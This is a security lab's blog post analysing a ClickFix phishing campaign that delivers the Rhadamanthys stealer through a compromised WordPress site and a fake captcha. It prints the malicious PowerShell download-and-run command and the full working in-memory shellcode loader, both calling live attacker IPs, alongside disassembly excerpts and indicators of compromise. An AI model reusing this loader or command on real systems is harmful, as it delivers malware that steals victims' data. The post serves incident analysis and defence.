,

By

Labs at ITRES

·

Tags:

Analysis of a ‘clickfix’ phishing to widespread Rhadamanthys

Recently, there was an incident regarding a ClickFix attack that its final objective was to deploy Rhadamanthys stealer. In this blog post this phishing campaign will be analyzed, the first stage of the malware and the final deployment of the stealer.

As said before, this all started with an incident detected by Microsoft Defender (and hopefully blocked). Defender raised up some alerts as shown below.

compromised wordpress site

In this case, this ClickFix compromised a WordPress site to load in an iframe a fake Cloudflare captcha. The user was navigating on internet to a well-known web by its part. But this time, this one had been compromised and the fake captcha was loaded, following the instruction of it by the user.

The user was navigating to the compromised WordPress site:

  • hxxps://[REDACTED]/

This site was compromised and loading the fake captcha in an iframe from zclouds.icu

The user was presented with a fake Cloudflare captcha, telling the user to press Win+R, Ctrl+V and then press OK. In this phase, a malicious PowerShell command had been placed into its clipboard.

  • powershell -w h -nop -c iex(iwr -Uri 155.94.155.25 -UseBasicParsing)

POWERSHELL SHELLCODE LOADER

The Powershell command copied and pasted to the run window and executed loads the second stage, consisting of a Powershell shellcode loader. This step involves a basic shellcode loader using dynamic compilation at runtime (Add-Type).

The full code executed is shown below.

Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;

public class Win32API {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
    
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
    
    public const uint MEM_COMMIT = 0x1000;
    public const uint MEM_RESERVE = 0x2000;
    public const uint PAGE_EXECUTE_READWRITE = 0x40;
    public const uint PAGE_READWRITE = 0x04;
}
"@

$downloadUrl = "http://94.154.35.115/user_profiles_photo/cptch.bin"

Write-Host "   ..." -ForegroundColor Cyan

try {
    #  …
    Write-Host "  …..." -ForegroundColor Yellow
    $webClient = New-Object System.Net.WebClient
    $payloadData = $webClient.DownloadData($downloadUrl)
    $webClient.Dispose()
    
    Write-Host " : $($payloadData.Length) " -ForegroundColor Green
    
    #    …
    $memorySize = $payloadData.Length
    $memoryAddress = [Win32API]::VirtualAlloc([IntPtr]::Zero, $memorySize, 
        [Win32API]::MEM_COMMIT -bor [Win32API]::MEM_RESERVE, [Win32API]::PAGE_READWRITE)
    
    if ($memoryAddress -eq [IntPtr]::Zero) {
        throw "   "
    }
    
    #  …   
    [System.Runtime.InteropServices.Marshal]::Copy($payloadData, 0, $memoryAddress, $memorySize)
    
    #     
    $previousProtection = 0
    $protectionResult = [Win32API]::VirtualProtect($memoryAddress, $memorySize, 
        [Win32API]::PAGE_EXECUTE_READWRITE, [ref]$previousProtection)
    
    if (-not $protectionResult) {
        throw "      "
    }
    
    Write-Host "    ..." -ForegroundColor Yellow
    
    #    
    $threadIdentifier = 0
    $threadHandle = [Win32API]::CreateThread([IntPtr]::Zero, 0, $memoryAddress, 
        [IntPtr]::Zero, 0, [ref]$threadIdentifier)
    
    if ($threadHandle -eq [IntPtr]::Zero) {
        throw "    "
    }
    
    #   
    [Win32API]::WaitForSingleObject($threadHandle, [uint32]::MaxValue) | Out-Null
    
    Write-Host "  " -ForegroundColor Green
}
catch {
    Write-Host " : $($_.Exception.Message)" -ForegroundColor Red
    exit 1
}

This will load the shellcode located at:

  • hxxp://94[.]154[.]35[.]115/user_profiles_photo/cptch.bin

This shellcode is heavily obfuscated, but we can get some interesting insights statically from it with the help of our friend ChatGPT.

One of the first tasks that this shellcode performs is to load the address of PEB. As you may know, this is a well-known technique to resolve dynamic symbols of current DLLs loaded to the process, for example kernel32.dll. The PEB contains a list of loaded modules (InMemoryOrderModuleList inside PEB_LDR_DATA). Traversing this list and getting the base address of a loaded module it is possible to recover the address of a symbol by parsing the Export Directory Table. (https://github.com/PeterGabaldon/WhatAboutSAM/blob/main/WhatAboutSAM/WhatAboutSAM/main.cpp#L49)

000000E8  65488B0425600000  mov rax,[gs:0x60]

The main parts of the shellcode are encrypted using RC5. FNV-1a is used for API hashing. This can be detected thanks to well-known constants defined in the shellcode.

The following constants are used by RC5.

[...]
0000031D  C7036351E1B7      mov dword [rbx],0xb7e15163
00000323  488D4B04          lea rcx,[rbx+0x4]
00000327  BA19000000        mov edx,0x19
0000032C  8B41FC            mov eax,[rcx-0x4]
0000032F  2D4786C861        sub eax,0x61c88647
[...]

Although API hashing is used, APIs can be inferred from the parameters used and some known constants. Here are some examples. For example, allocating memory regions with VirtualAlloc.

[...]
0000063D  448D4904          lea r9d,[rcx+0x4]
00000641  41B800100000      mov r8d,0x1000 // MEM_COMMIT
00000647  8BD0              mov edx,eax
00000649  8BD8              mov ebx,eax
0000064B  FF542458          call [rsp+0x58]
0000064F  4885C0            test rax,rax
00000652  488BE8            mov rbp,rax
[...]

Or VirtualProtect to make reserved page executable.

[...]
00000706  8B942440010000    mov edx,[rsp+0x140]   ; dwSize
0000070D  4C8D8C2440010000  lea r9,[rsp+0x140]    ; &oldProtect
00000715  41B840000000      mov r8d,0x40          ; PAGE_EXECUTE_READWRITE
0000071B  488BCD            mov rcx,rbp           ; lpAddress
0000071E  FF542468          call [rsp+0x68]
[...]

STEALER

This shellcode is responsible for loading the next stage from:

  • hxxps://91[.]92[.]241[.]235/gate2hj45g2kway/11x6ahk8.rk9cq

This stage is injected into a newly spawned OpenWith.exe process. This stage will load RHADAMANTHYS stealer.

The dynamic analysis from JoeSandbox can be found here

This shellcode is presented as a PNG file. Also, this one contains Anti-VM protection. As you can see, information about the processor is queried through WMI.

Judging for the analysis (comparing with the real one OpenWith.exe https://www.joesandbox.com/analysis/1777860/0/html) this process is totally spoofed (Hollow Process Injection).

CONCLUSION

This incident demonstrates the importance of being aware when navigating. Even visiting a secure and well-known web page can be dangerous if it gets compromised and swapped with malicious artifacts. If tomorrow Netflix gets hacked and asks you to execute a malicious PowerShell, will you?

Even more, this incident demonstrates the importance of having an EDR in place, it not only blocked the malicious PowerShell script, it also helped the investigation and remediation phase to demonstrate that no contact were made to the malicious IPs.

And specifically for this type of attack never never never trust on executing a command that have pasted into the clipboard and sent to you by an unknown entity.

IOCs

  • Fake CAPTCHA host: zclouds[.]icu
  • Initial PowerShell download host: 155[.]94[.]155[.]25
  • Shellcode fetch: hxxp://94[.]154[.]35[.]115/user_profiles_photo/cptch.bin
  • Subsequent stage: hxxps://91[.]92[.]241[.]235/gate2hj45g2kway/11x6ahk8.rk9cq
  • Process behavior: unusual OpenWith.exe creation with WMI queries to processor information.
  • PowerShell Shellcode loader: 56cf64ca5d71f829a5db031b0ea02ad7aaf9cafe881fbbe30487bd5dccf7a4f6 (SHA256)
  • First Stage Shellcode (cptch.bin): 510b45e5977b671a550e466dd2ffde4e5dbd51a13d4075a6720388833ee33d9f (SHA256)
  • Second stage: 817211e0d6fc9e4124f92c582a6c148639e847b5d1c8f7f92a9bc8c541f0f6a2 (SHA256)

Response to “Analysis of a ‘clickfix’ phishing to widespread Rhadamanthys”

  1. CMS Media Timeleaks in Jetpack, WordPress and beyond – Labs at ITRES

    […] “Analysis of a ClickFix phishing to widespread Rhadamanthys”https://labs.itresit.es/2025/09/17/analysis-of-a-clickfix-phishing-to-widespread-rhadamanthys/ […]

    Like

    Reply

Leave a reply to CMS Media Timeleaks in Jetpack, WordPress and beyond – Labs at ITRES Cancel reply